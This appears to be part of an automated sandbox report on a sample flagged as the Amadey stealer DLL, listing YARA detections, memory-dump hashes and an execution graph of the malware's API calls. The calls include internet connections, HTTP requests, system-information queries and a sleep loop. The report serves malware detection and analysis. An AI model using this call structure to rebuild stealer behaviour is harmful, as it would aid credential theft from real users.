                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000004.00000003.2188818191.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:false

                              Reset < >
                                Memory Dump Source
                                • Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f60000_setup.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d76c77647bd405c6d15db61ae1f5a84a91f1d973d27a4867fa7e3c97be34f796
                                • Instruction ID: 9c0df2ff82636eba11a8c6bbece17091e60c78d45624f9483c418a15785c0cfb
                                • Opcode Fuzzy Hash: d76c77647bd405c6d15db61ae1f5a84a91f1d973d27a4867fa7e3c97be34f796
                                • Instruction Fuzzy Hash: AA0147E738C111FE2253CD810B18AFB252EE7D63303308015B807DA602FE846A473971
                                Memory Dump Source
                                • Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f60000_setup.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1b774fddb685002c0009e19eff7fe0d55ee4be0f372f9d2c7428dc8603667291
                                • Instruction ID: 1b57d00b5fc5805beb1eee00c633d5ac4b8fb1c9e1dfddf63d7798b747f24963
                                • Opcode Fuzzy Hash: 1b774fddb685002c0009e19eff7fe0d55ee4be0f372f9d2c7428dc8603667291
                                • Instruction Fuzzy Hash: B9117AA774C156FEA343CE901A55AF63B29EB473307304465F443CB902FE847A4B7A21
                                Memory Dump Source
                                • Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f60000_setup.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5877c33e4f3ae37d586adda15367fa8bd9389ca30e486123fd28cf692cb799af
                                • Instruction ID: 6faccba528eb7fad0409aeb9ff58a81c8b3f2aca3dcd4262ca4672f91227a2c5
                                • Opcode Fuzzy Hash: 5877c33e4f3ae37d586adda15367fa8bd9389ca30e486123fd28cf692cb799af
                                • Instruction Fuzzy Hash: 2501F5A725C205FEA352CE864B08BF77629EB97330B304425F5439A602FA946B477D71
                                Memory Dump Source
                                • Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f60000_setup.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0bdaf0a5c8efc8e50449ef8d0566c520ed47093953ed7999795eb142433b444e
                                • Instruction ID: fad4d0efb16a34e4b98249d1e8cea06018b140aef59a971960d4e339f2d47928
                                • Opcode Fuzzy Hash: 0bdaf0a5c8efc8e50449ef8d0566c520ed47093953ed7999795eb142433b444e
                                • Instruction Fuzzy Hash: 7C0124D338C211FDA393CD804B18AF63A6EE7963307304425B453DA612FE846A973A72
                                Memory Dump Source
                                • Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f60000_setup.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f1560817c8fbe698632fbc334a2739af7a623e0b8fdb2ce80e90385862997c6f
                                • Instruction ID: 33814d7a2d162b297aaf0913fe89ee441ea6b82a916435d2da37094c17d96622
                                • Opcode Fuzzy Hash: f1560817c8fbe698632fbc334a2739af7a623e0b8fdb2ce80e90385862997c6f
                                • Instruction Fuzzy Hash: 800126E738C111FE6243CD854B58AF7392EE7963303308415B407CA612FA84AA873971
                                Memory Dump Source
                                • Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f60000_setup.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3af5d9c5352d8d021216c28b8d63fb883e4a07620bf88145b7bd21c0d9165d8c
                                • Instruction ID: 8e9ef57d84478bbe821bb65f387b735b142c24f63c26f2ffe43ffd7d4dde88df
                                • Opcode Fuzzy Hash: 3af5d9c5352d8d021216c28b8d63fb883e4a07620bf88145b7bd21c0d9165d8c
                                • Instruction Fuzzy Hash: 790126F764C6406FB207C5506A54ABA3B68EFC233037184BBE403D751AF9416C8BA530
                                Memory Dump Source
                                • Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f60000_setup.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 047f9ba3f9c6eabd73bc7c2c1b191b36788fcf0b90573a9393b321684bc7fbe4
                                • Instruction ID: aeae8c85357211392047d763297accbe911bbc712ab1b31f76d0ae4628a3643e
                                • Opcode Fuzzy Hash: 047f9ba3f9c6eabd73bc7c2c1b191b36788fcf0b90573a9393b321684bc7fbe4
                                • Instruction Fuzzy Hash: 28F0F6E7258110BE6353CE951B449F76B6AEB973303308415F44798612FA945B473932
                                Memory Dump Source
                                • Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f60000_setup.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eef4d9f988a6eeea8a807e9ed60c0b168ed57915094fa0d3e414984ad4ae900d
                                • Instruction ID: eeffd5016f51eee303f7d6aabde55443d921a94c20e7dae49e37c6e45df2effd
                                • Opcode Fuzzy Hash: eef4d9f988a6eeea8a807e9ed60c0b168ed57915094fa0d3e414984ad4ae900d
                                • Instruction Fuzzy Hash: 7FF024EB24C110FE2343CE951B189F76A2EE7963303308025B413D9212FA906F873932
                                Memory Dump Source
                                • Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f60000_setup.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a7b322d347cad84fb82ad8d74137ae6d3e8741c94167a6f4fe9b69a55bb191dd
                                • Instruction ID: f786e953a8135bd4653a0a85d1a0fb178b2687a67bdea315521c4b79d9d667b6
                                • Opcode Fuzzy Hash: a7b322d347cad84fb82ad8d74137ae6d3e8741c94167a6f4fe9b69a55bb191dd
                                • Instruction Fuzzy Hash: 27F046A725C341AFA312D9A10A199BB7669EA83230370416EF003C6042F6811B4B7A32
                                Memory Dump Source
                                • Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f60000_setup.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e20bdef299c17c80aaee1d7d61a5ce97ae6e5c0e8ee012a2ef809eac7e984f71
                                • Instruction ID: 081bfafa15cc20922eb00969b4a434ca4f5b048bb14947ac642eaeeb577abc35
                                • Opcode Fuzzy Hash: e20bdef299c17c80aaee1d7d61a5ce97ae6e5c0e8ee012a2ef809eac7e984f71
                                • Instruction Fuzzy Hash: 5AE086EB29D205BF7252D9916B159FB666DE6D33303308466F053D5101F9C41A473932
                                Memory Dump Source
                                • Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f60000_setup.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 13b0299652663d32c2c5592d5f6caaa59762a3f1f64773152d0c8d6b61edb9f4
                                • Instruction ID: 10e5efc2ed4a29a263add7bad1c0ba340d174e91195bfdee3fa1d88b3dcd0277
                                • Opcode Fuzzy Hash: 13b0299652663d32c2c5592d5f6caaa59762a3f1f64773152d0c8d6b61edb9f4
                                • Instruction Fuzzy Hash: C6E08CE7299215BE7252C9C16B049BA666DEA83730330C86AF013D5002F9C46A473931
                                Memory Dump Source
                                • Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f60000_setup.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e8df2b89c154d58c065402209ab4d95a51631a1250c44025e79f171c7f02c404
                                • Instruction ID: d8f12feeb9658d9ef5cc486d4069f9c24a6d2938722ab93da784c1b0e01cc936
                                • Opcode Fuzzy Hash: e8df2b89c154d58c065402209ab4d95a51631a1250c44025e79f171c7f02c404
                                • Instruction Fuzzy Hash: 18D017E72482087E221390942F18AF71A2CDAD273033080A9B807E7206E5850A067030

                                Execution Graph

                                Execution Coverage:8%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:4.9%
                                Total number of Nodes:555
                                Total number of Limit Nodes:28
                                execution_graph 13186 50e410 13187 50e435 13186->13187 13189 50e419 13186->13189 13189->13187 13190 50e270 13189->13190 13191 50e280 __dosmaperr 13190->13191 13196 538979 13191->13196 13193 50e270 4 API calls 13194 50e2bd std::_Xinvalid_argument 13193->13194 13194->13193 13195 50e435 13194->13195 13195->13189 13197 538994 13196->13197 13200 5386d7 13197->13200 13199 53899e 13199->13194 13201 5386e9 13200->13201 13202 53683a __fassign 4 API calls 13201->13202 13205 5386fe __cftof __dosmaperr 13201->13205 13204 53872e 13202->13204 13204->13205 13206 538925 13204->13206 13205->13199 13207 538962 13206->13207 13209 538932 13206->13209 13217 53d2e9 13207->13217 13210 538941 __fassign 13209->13210 13212 53d30d 13209->13212 13210->13204 13213 53683a __fassign 4 API calls 13212->13213 13214 53d32a 13213->13214 13216 53d33a 13214->13216 13221 53f07f 13214->13221 13216->13210 13218 53d2f4 13217->13218 13219 53b4bb __fassign 4 API calls 13218->13219 13220 53d304 13219->13220 13220->13210 13222 53683a __fassign 4 API calls 13221->13222 13223 53f09f __cftof __fassign __freea 13222->13223 13223->13216 13379 5086b0 13380 5086b6 13379->13380 13386 536659 13380->13386 13383 5086d6 13385 5086d0 13393 5365a2 13386->13393 13388 5086c3 13388->13383 13389 5366e7 13388->13389 13390 5366f3 13389->13390 13392 5366fd __cftof __dosmaperr 13390->13392 13405 536670 13390->13405 13392->13385 13394 5365ae 13393->13394 13396 5365b5 __cftof __dosmaperr 13394->13396 13397 53a783 13394->13397 13396->13388 13398 53a78f 13397->13398 13401 53a827 13398->13401 13400 53a7aa 13400->13396 13403 53a84a 13401->13403 13402 53d6ef RtlAllocateHeap 13404 53a890 ___free_lconv_mon 13402->13404 13403->13402 13403->13403 13403->13404 13404->13400 13406 536692 13405->13406 13408 53667d __cftof __dosmaperr ___free_lconv_mon 13405->13408 13406->13408 13409 539ef9 13406->13409 13408->13392 13410 539f36 13409->13410 13411 539f11 13409->13411 13410->13408 13411->13410 13413 5402f8 13411->13413 13414 540304 13413->13414 13416 54030c __cftof __dosmaperr 13414->13416 13417 5403ea 13414->13417 13416->13410 13418 54040c 13417->13418 13420 540410 __cftof __dosmaperr 13417->13420 13418->13420 13421 53fb7f 13418->13421 13420->13416 13422 53fbcc 13421->13422 13423 53683a __fassign 4 API calls 13422->13423 13427 53fbdb __cftof 13423->13427 13424 53d2e9 4 API calls 13424->13427 13425 53c4ea GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __fassign 13425->13427 13426 53fe7b 13426->13420 13426->13426 13427->13424 13427->13425 13427->13426 13427->13427 13591 50dfd0 recv 13592 50e032 recv 13591->13592 13593 50e067 recv 13592->13593 13595 50e0a1 13593->13595 13594 50e1c3 13595->13594 13596 51c5dc GetSystemTimePreciseAsFileTime 13595->13596 13597 50e1fe 13596->13597 13598 51c19a 10 API calls 13597->13598 13599 50e268 13598->13599 13526 519310 13527 519325 13526->13527 13528 519363 13526->13528 13529 51d041 SleepConditionVariableCS 13527->13529 13530 51932f 13529->13530 13530->13528 13531 51cff7 RtlWakeAllConditionVariable 13530->13531 13531->13528 13521 536974 13522 536982 13521->13522 13523 53698c 13521->13523 13524 5368bd 4 API calls 13523->13524 13525 5369a6 ___free_lconv_mon 13524->13525 13428 536559 13429 5363f7 __fassign 2 API calls 13428->13429 13430 53656a 13429->13430 13110 51b85e 13115 51b6e5 13110->13115 13112 51b886 13123 51b648 13112->13123 13114 51b89f 13116 51b6f1 Concurrency::details::_Reschedule_chore 13115->13116 13117 51b722 13116->13117 13133 51c5dc 13116->13133 13117->13112 13121 51b70c __Mtx_unlock 13122 502ad0 10 API calls 13121->13122 13122->13117 13124 51b654 Concurrency::details::_Reschedule_chore 13123->13124 13125 51c5dc GetSystemTimePreciseAsFileTime 13124->13125 13126 51b6ae 13124->13126 13127 51b669 13125->13127 13126->13114 13128 502ad0 10 API calls 13127->13128 13129 51b66f __Mtx_unlock 13128->13129 13130 502ad0 10 API calls 13129->13130 13131 51b68c __Cnd_broadcast 13130->13131 13131->13126 13132 502ad0 10 API calls 13131->13132 13132->13126 13141 51c382 13133->13141 13135 51b706 13136 502ad0 13135->13136 13137 502ada 13136->13137 13138 502adc 13136->13138 13137->13121 13158 51c19a 13138->13158 13142 51c3aa 13141->13142 13143 51c3d8 13141->13143 13142->13135 13143->13142 13147 51ce9b 13143->13147 13145 51c42d __Xtime_diff_to_millis2 13145->13142 13146 51ce9b _xtime_get GetSystemTimePreciseAsFileTime 13145->13146 13146->13145 13148 51ceaa 13147->13148 13150 51ceb7 __aulldvrm 13147->13150 13148->13150 13151 51ce74 13148->13151 13150->13145 13154 51cb1a 13151->13154 13155 51cb2b GetSystemTimePreciseAsFileTime 13154->13155 13157 51cb37 13154->13157 13155->13157 13157->13150 13159 51c1c2 13158->13159 13161 51c1a4 13158->13161 13159->13159 13161->13159 13162 51c1c7 13161->13162 13165 502aa0 13162->13165 13164 51c1de std::_Throw_future_error 13164->13161 13179 51be0f 13165->13179 13167 502abf 13167->13164 13168 538aaf __fassign 4 API calls 13169 536c26 13168->13169 13170 536c43 13169->13170 13171 536c35 13169->13171 13173 5368bd 4 API calls 13170->13173 13172 536c99 9 API calls 13171->13172 13174 536c3f 13172->13174 13177 536c5d 13173->13177 13174->13164 13175 502ab4 13175->13167 13175->13168 13176 536c71 ___free_lconv_mon 13176->13164 13177->13176 13178 536c99 9 API calls 13177->13178 13178->13176 13182 51cb61 13179->13182 13183 51be22 13182->13183 13184 51cb6f InitOnceExecuteOnce 13182->13184 13183->13175 13184->13183 12931 508a60 GetTempPathA 12932 508abc shared_ptr 12931->12932 13224 507400 13225 507435 shared_ptr 13224->13225 13229 50752f shared_ptr 13225->13229 13230 51d041 13225->13230 13227 5075bd 13227->13229 13234 51cff7 13227->13234 13233 51d052 13230->13233 13231 51d05a 13231->13227 13233->13231 13238 51d0c9 13233->13238 13236 51d007 13234->13236 13235 51d0af 13235->13229 13236->13235 13237 51d0ab RtlWakeAllConditionVariable 13236->13237 13237->13229 13239 51d0d7 SleepConditionVariableCS 13238->13239 13240 51d0f0 13238->13240 13239->13240 13240->13233 13242 516ae0 13243 516b10 13242->13243 13246 5146c0 13243->13246 13245 516b5c Sleep 13245->13243 13249 5146fb 13246->13249 13261 514a72 shared_ptr 13246->13261 13247 514e69 shared_ptr 13247->13245 13249->13261 13265 50bd60 13249->13265 13251 514f25 shared_ptr 13252 514fee shared_ptr 13251->13252 13256 516ab6 13251->13256 13282 507d00 13252->13282 13254 514ffd 13288 5082b0 13254->13288 13257 5146c0 10 API calls 13256->13257 13259 516b5c Sleep 13257->13259 13258 514a0d 13260 50bd60 4 API calls 13258->13260 13258->13261 13259->13256 13260->13261 13261->13247 13274 5065b0 13261->13274 13262 514753 shared_ptr __dosmaperr 13262->13258 13263 538979 4 API calls 13262->13263 13263->13258 13264 515016 shared_ptr 13264->13245 13266 50c14e shared_ptr 13265->13266 13267 50bdb2 13265->13267 13266->13262 13267->13266 13268 50bdc6 InternetOpenW InternetConnectA 13267->13268 13269 50be3d shared_ptr 13268->13269 13270 50bf13 HttpSendRequestA 13269->13270 13271 50bf2b shared_ptr 13270->13271 13272 50bfb3 InternetReadFile 13271->13272 13273 50bfda 13272->13273 13275 50660f 13274->13275 13292 502280 13275->13292 13277 506699 shared_ptr 13278 502280 4 API calls 13277->13278 13279 506822 shared_ptr 13277->13279 13280 506727 shared_ptr 13278->13280 13279->13251 13280->13279 13281 502280 4 API calls 13280->13281 13281->13280 13284 507d66 shared_ptr __cftof 13282->13284 13283 507ea3 GetNativeSystemInfo 13285 507ea7 13283->13285 13284->13283 13284->13285 13287 507eb8 shared_ptr 13284->13287 13285->13287 13376 538a81 13285->13376 13287->13254 13289 508315 shared_ptr __cftof 13288->13289 13290 508454 GetNativeSystemInfo 13289->13290 13291 508333 13289->13291 13290->13291 13291->13264 13295 502240 13292->13295 13296 502256 13295->13296 13299 538667 13296->13299 13302 537456 13299->13302 13301 502264 13301->13277 13303 537496 13302->13303 13304 53747e __cftof __dosmaperr 13302->13304 13303->13304 13305 53683a __fassign 4 API calls 13303->13305 13304->13301 13306 5374ae 13305->13306 13308 537a11 13306->13308 13310 537a22 13308->13310 13309 537a31 __cftof __dosmaperr 13309->13304 13310->13309 13315 537fb5 13310->13315 13320 537c0f 13310->13320 13325 537c35 13310->13325 13335 537d83 13310->13335 13316 537fc5 13315->13316 13317 537fbe 13315->13317 13316->13310 13344 53799d 13317->13344 13319 537fc4 13319->13310 13321 537c18 13320->13321 13322 537c1f 13320->13322 13323 53799d 4 API calls 13321->13323 13322->13310 13324 537c1e 13323->13324 13324->13310 13326 537c3c 13325->13326 13327 537c56 __cftof __dosmaperr 13325->13327 13326->13327 13329 537def 13326->13329 13330 537db6 13326->13330 13333 537dc4 13326->13333 13327->13310 13334 537dd8 13329->13334 13348 5381dd 13329->13348 13330->13333 13330->13334 13352 53808e 13330->13352 13333->13334 13356 538537 13333->13356 13334->13310 13336 537db6 13335->13336 13337 537d9c 13335->13337 13339 53808e 4 API calls 13336->13339 13342 537dc4 13336->13342 13343 537dd8 13336->13343 13337->13336 13338 537def 13337->13338 13337->13342 13340 5381dd 4 API calls 13338->13340 13338->13343 13339->13342 13340->13342 13341 538537 4 API calls 13341->13343 13342->13341 13342->13343 13343->13310 13346 5379af __dosmaperr 13344->13346 13345 538979 4 API calls 13347 5379d2 __dosmaperr 13345->13347 13346->13345 13347->13319 13349 5381f8 13348->13349 13350 53822a 13349->13350 13360 53c65f 13349->13360 13350->13333 13353 5380a7 13352->13353 13363 53d199 13353->13363 13355 53815a 13355->13333 13355->13355 13357 5385aa 13356->13357 13358 538554 13356->13358 13357->13334 13358->13357 13359 53c65f __cftof 4 API calls 13358->13359 13359->13358 13361 53c504 __cftof GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13360->13361 13362 53c677 13361->13362 13362->13350 13365 53d1bf 13363->13365 13375 53d1a9 __cftof __dosmaperr 13363->13375 13364 53d256 13368 53d2b5 13364->13368 13369 53d27f 13364->13369 13365->13364 13366 53d25b 13365->13366 13365->13375 13367 53c9b0 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13366->13367 13367->13375 13370 53ccc9 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13368->13370 13371 53d284 13369->13371 13372 53d29d 13369->13372 13370->13375 13374 53d00f GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13371->13374 13373 53ceb3 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13372->13373 13373->13375 13374->13375 13375->13355 13377 5386d7 4 API calls 13376->13377 13378 538a9f 13377->13378 13378->13287 13431 51a140 13432 51a1c0 13431->13432 13438 517040 13432->13438 13434 51a3ee shared_ptr 13435 51a1fc shared_ptr 13435->13434 13442 503ea0 13435->13442 13437 51a3d6 13440 517081 __cftof __Mtx_init_in_situ 13438->13440 13439 5172b6 13439->13435 13440->13439 13448 502e80 13440->13448 13443 503f08 13442->13443 13444 503ede 13442->13444 13445 503f18 13443->13445 13491 502bc0 13443->13491 13444->13437 13445->13437 13449 502ec6 13448->13449 13452 502f2f 13448->13452 13450 51c5dc GetSystemTimePreciseAsFileTime 13449->13450 13451 502ed2 13450->13451 13453 502fde 13451->13453 13456 502edd __Mtx_unlock 13451->13456 13458 51c5dc GetSystemTimePreciseAsFileTime 13452->13458 13467 502faf 13452->13467 13454 51c19a 10 API calls 13453->13454 13455 502fe4 13454->13455 13457 51c19a 10 API calls 13455->13457 13456->13452 13456->13455 13459 502f79 13457->13459 13458->13459 13460 51c19a 10 API calls 13459->13460 13461 502f80 __Mtx_unlock 13459->13461 13460->13461 13462 51c19a 10 API calls 13461->13462 13463 502f98 __Cnd_broadcast 13461->13463 13462->13463 13464 51c19a 10 API calls 13463->13464 13463->13467 13465 502ffc 13464->13465 13466 51c5dc GetSystemTimePreciseAsFileTime 13465->13466 13477 503040 shared_ptr __Mtx_unlock 13466->13477 13467->13439 13468 503185 13469 51c19a 10 API calls 13468->13469 13470 50318b 13469->13470 13471 51c19a 10 API calls 13470->13471 13472 503191 13471->13472 13473 51c19a 10 API calls 13472->13473 13479 503153 __Mtx_unlock 13473->13479 13474 503167 13474->13439 13475 51c19a 10 API calls 13476 50319d 13475->13476 13477->13468 13477->13470 13477->13474 13478 51c5dc GetSystemTimePreciseAsFileTime 13477->13478 13480 50311f 13478->13480 13479->13474 13479->13475 13480->13468 13480->13472 13480->13479 13482 51bc7c 13480->13482 13485 51baa2 13482->13485 13484 51bc8c 13484->13480 13486 51bacc 13485->13486 13487 51ce9b _xtime_get GetSystemTimePreciseAsFileTime 13486->13487 13488 51bad4 __Xtime_diff_to_millis2 13486->13488 13489 51baff __Xtime_diff_to_millis2 13487->13489 13488->13484 13489->13488 13490 51ce9b _xtime_get GetSystemTimePreciseAsFileTime 13489->13490 13490->13488 13492 502bce 13491->13492 13498 51b777 13492->13498 13494 502c02 13495 502c09 13494->13495 13504 502c40 13494->13504 13495->13437 13497 502c18 std::_Throw_future_error 13499 51b784 13498->13499 13503 51b7a3 Concurrency::details::_Reschedule_chore 13498->13503 13507 51caa7 13499->13507 13501 51b794 13501->13503 13509 51b74e 13501->13509 13503->13494 13515 51b72b 13504->13515 13506 502c72 shared_ptr 13506->13497 13508 51cac2 CreateThreadpoolWork 13507->13508 13508->13501 13511 51b757 Concurrency::details::_Reschedule_chore 13509->13511 13513 51ccfc 13511->13513 13512 51b771 13512->13503 13514 51cd11 TpPostWork 13513->13514 13514->13512 13516 51b737 13515->13516 13517 51b747 13515->13517 13516->13517 13519 51c9a8 13516->13519 13517->13506 13520 51c9bd TpReleaseWork 13519->13520 13520->13517 13532 518700 13533 51875a __cftof 13532->13533 13539 519ae0 13533->13539 13535 518784 13538 51879c 13535->13538 13543 5043b0 13535->13543 13537 518809 std::_Throw_future_error 13540 519b15 13539->13540 13549 502ca0 13540->13549 13542 519b46 13542->13535 13544 51be0f InitOnceExecuteOnce 13543->13544 13545 5043ca 13544->13545 13546 5043d1 13545->13546 13547 536beb 9 API calls 13545->13547 13546->13537 13548 5043e4 13547->13548 13550 502cdd 13549->13550 13551 51be0f InitOnceExecuteOnce 13550->13551 13553 502d06 13551->13553 13552 502d11 13552->13542 13553->13552 13554 502d48 13553->13554 13558 51be27 13553->13558 13565 502400 13554->13565 13559 51be33 std::_Throw_future_error 13558->13559 13560 51bea3 13559->13560 13561 51be9a 13559->13561 13563 502aa0 10 API calls 13560->13563 13568 51bdaf 13561->13568 13564 51be9f 13563->13564 13564->13554 13586 51b506 13565->13586 13567 502432 13569 51cb61 InitOnceExecuteOnce 13568->13569 13570 51bdc7 13569->13570 13571 51bdce 13570->13571 13574 536beb 13570->13574 13571->13564 13573 51bdd7 13573->13564 13581 536bf7 13574->13581 13575 538aaf __fassign 4 API calls 13576 536c26 13575->13576 13577 536c43 13576->13577 13578 536c35 13576->13578 13580 5368bd 4 API calls 13577->13580 13579 536c99 9 API calls 13578->13579 13582 536c3f 13579->13582 13583 536c5d 13580->13583 13581->13575 13582->13573 13584 536c99 9 API calls 13583->13584 13585 536c71 ___free_lconv_mon 13583->13585 13584->13585 13585->13573 13588 51b521 std::_Throw_future_error 13586->13588 13587 538aaf __fassign 4 API calls 13589 51b5cf 13587->13589 13588->13587 13590 51b588 __fassign 13588->13590 13590->13567 12933 536beb 12940 536bf7 12933->12940 12935 536c26 12936 536c43 12935->12936 12937 536c35 12935->12937 12953 5368bd 12936->12953 12938 536c99 9 API calls 12937->12938 12941 536c3f 12938->12941 12945 538aaf 12940->12945 12942 536c5d 12944 536c71 ___free_lconv_mon 12942->12944 12956 536c99 12942->12956 12946 538ab4 __fassign 12945->12946 12949 538abf 12946->12949 12968 53d4f4 12946->12968 12965 53651d 12949->12965 12950 53d727 RtlAllocateHeap 12951 53d73a __dosmaperr 12950->12951 12952 538af2 __fassign 12950->12952 12951->12935 12952->12950 12952->12951 12987 53683a 12953->12987 12955 5368cf 12955->12942 12957 536cc4 __cftof 12956->12957 12963 536ca7 __cftof __dosmaperr 12956->12963 12958 536d06 CreateFileW 12957->12958 12964 536cea __cftof __dosmaperr 12957->12964 12959 536d2a 12958->12959 12960 536d38 12958->12960 13023 536e01 GetFileType 12959->13023 13037 536d77 12960->13037 12963->12944 12964->12944 12975 5363f7 12965->12975 12969 53d500 __fassign 12968->12969 12970 53651d __fassign 2 API calls 12969->12970 12971 53d55c __cftof __dosmaperr __fassign 12969->12971 12974 53d6ee __fassign 12970->12974 12971->12949 12972 53d727 RtlAllocateHeap 12973 53d73a __dosmaperr 12972->12973 12972->12974 12973->12949 12974->12972 12974->12973 12977 536405 __fassign 12975->12977 12976 536450 12976->12952 12977->12976 12980 53645b 12977->12980 12985 53a1c2 GetPEB 12980->12985 12982 536465 12983 53646a GetPEB 12982->12983 12984 53647a __fassign 12982->12984 12983->12984 12986 53a1dc __fassign 12985->12986 12986->12982 12988 536851 12987->12988 12989 53685a 12987->12989 12988->12955 12989->12988 12993 53b4bb 12989->12993 12994 53b4ce 12993->12994 12996 536890 12993->12996 12994->12996 13001 53f46b 12994->13001 12997 53b4e8 12996->12997 12998 53b510 12997->12998 12999 53b4fb 12997->12999 12998->12988 12999->12998 13006 53e571 12999->13006 13002 53f477 __fassign 13001->13002 13003 53f4c6 13002->13003 13004 538aaf __fassign 4 API calls 13002->13004 13003->12996 13005 53f4eb 13004->13005 13007 53e57b 13006->13007 13010 53e489 13007->13010 13009 53e581 13009->12998 13014 53e495 __fassign ___free_lconv_mon 13010->13014 13011 53e4b6 13011->13009 13012 538aaf __fassign 4 API calls 13013 53e528 13012->13013 13015 53e564 13013->13015 13019 53a5ee 13013->13019 13014->13011 13014->13012 13015->13009 13020 53a611 13019->13020 13021 538aaf __fassign 4 API calls 13020->13021 13022 53a687 13021->13022 13024 536ed2 __dosmaperr 13023->13024 13025 536e3c 13023->13025 13024->12964 13026 536e56 __cftof 13025->13026 13059 537177 13025->13059 13026->13024 13028 536e75 GetFileInformationByHandle 13026->13028 13028->13024 13029 536e8b 13028->13029 13045 5370c9 13029->13045 13033 536ea8 13034 536f71 SystemTimeToTzSpecificLocalTime 13033->13034 13035 536ebb 13034->13035 13036 536f71 SystemTimeToTzSpecificLocalTime 13035->13036 13036->13024 13082 537314 13037->13082 13039 536d85 13040 536d8a __dosmaperr 13039->13040 13041 5370c9 4 API calls 13039->13041 13040->12964 13042 536da3 13041->13042 13043 537177 RtlAllocateHeap 13042->13043 13044 536dc2 13043->13044 13044->12964 13046 5370df _wcsrchr 13045->13046 13049 536e97 13046->13049 13063 53b9e4 13046->13063 13048 537123 13048->13049 13050 53b9e4 4 API calls 13048->13050 13055 536f71 13049->13055 13051 537134 13050->13051 13051->13049 13052 53b9e4 4 API calls 13051->13052 13053 537145 13052->13053 13053->13049 13054 53b9e4 4 API calls 13053->13054 13054->13049 13056 536f89 13055->13056 13057 536fa9 SystemTimeToTzSpecificLocalTime 13056->13057 13058 536f8f 13056->13058 13057->13058 13058->13033 13060 537190 13059->13060 13062 5371a4 __dosmaperr 13060->13062 13074 53b568 13060->13074 13062->13026 13064 53b9f2 13063->13064 13065 53b9f8 __cftof __dosmaperr 13064->13065 13068 53ba2d 13064->13068 13065->13048 13067 53ba28 13067->13048 13069 53ba57 13068->13069 13070 53ba3d __cftof __dosmaperr 13068->13070 13069->13070 13071 53683a __fassign 4 API calls 13069->13071 13070->13067 13072 53ba81 13071->13072 13072->13070 13073 53b9a5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13072->13073 13073->13072 13075 53b592 __cftof 13074->13075 13077 53b5ae __dosmaperr ___free_lconv_mon 13075->13077 13078 53d6ef 13075->13078 13077->13062 13079 53d6fc __fassign 13078->13079 13080 53d73a __dosmaperr 13079->13080 13081 53d727 RtlAllocateHeap 13079->13081 13080->13077 